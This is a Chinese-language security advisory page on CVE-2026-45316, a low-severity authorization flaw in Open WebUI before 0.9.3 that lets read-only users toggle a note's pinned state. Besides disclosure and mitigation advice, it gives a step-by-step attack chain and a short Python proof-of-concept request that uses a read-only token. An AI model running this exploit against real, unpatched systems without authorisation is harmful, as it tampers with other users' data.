IPBUF安全漏洞报告
English
CVE-2026-45316 CVSS 3.5 低危

CVE-2026-45316 Open WebUI越权访问漏洞

披露日期: 2026-05-15
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-45316
漏洞类型
权限提升
CVSS评分
3.5 低危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Open WebUI

相关标签

权限提升越权访问Open WebUICVE-2026-45316

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.9.3版本之前的代码中,存在一处权限验证逻辑缺陷。具体而言,当系统处理POST `/api/v1/notes/{id}/pin`请求以切换笔记的`is_pinned`状态时,仅验证了用户是否具备该笔记的读取权限,而未验证写入权限。这导致仅具有只读访问权限的低权限用户能够执行状态修改操作,违反了最小权限原则。

技术细节

该漏洞属于典型的业务逻辑越权漏洞。Open WebUI在实现笔记管理功能时,对API接口的权限划分不够严谨。具体来说,`POST /api/v1/notes/{id}/pin` 接口用于更新笔记的固定状态,这在逻辑上属于“写”操作。但在受影响版本的代码实现中,该接口的权限校验函数仅调用了用于检查“读”权限的逻辑,导致权限检查失效。攻击者利用此漏洞,无需拥有笔记的编辑或写入权限,只需具有查看权限,即可通过发送HTTP POST请求触发状态变更。由于系统未能区分读操作与写操作的权限边界,攻击者可以恶意修改其他用户的笔记显示状态,造成数据完整性受损。此漏洞利用难度低,且需要用户登录(低权限),配合社会工程学诱导点击可能更具危害。

攻击链分析

STEP 1
1. 获取访问权限
攻击者注册或获取一个Open WebUI平台的普通用户账号,该账号仅拥有对特定共享笔记的只读权限。
STEP 2
2. 识别目标ID
攻击者在Web界面中浏览或通过API响应获取目标笔记的ID(note_id)。
STEP 3
3. 发送恶意请求
攻击者使用Burp Suite或Python脚本,向`/api/v1/notes/{id}/pin`端点发送POST请求,并在Header中携带只读用户的Token。
STEP 4
4. 完成越权操作
服务器由于校验逻辑缺陷,误认为用户有权限操作,成功修改笔记的`is_pinned`状态,返回200 OK响应。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration base_url = "http://localhost:3000" note_id = "TARGET_NOTE_ID" # Replace with a valid note ID accessible by the user auth_token = "READ_ONLY_USER_TOKEN" # Valid session token for a read-only user # The vulnerable endpoint endpoint = f"{base_url}/api/v1/notes/{note_id}/pin" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } try: # Send POST request to toggle pin status # Vulnerability: The server checks READ permission but performs a WRITE action response = requests.post(endpoint, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Note pin status toggled.") print(f"[+] Response: {response.json()}") else: print(f"[-] Failed to exploit. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error: {e}")

影响范围

Open WebUI < 0.9.3

防御指南

临时缓解措施
建议立即升级到修复版本。若无法立即升级,应限制对Open WebUI平台的网络访问,仅允许受信任的内部IP访问,并密切监控笔记固定相关的API日志,以发现异常的修改请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表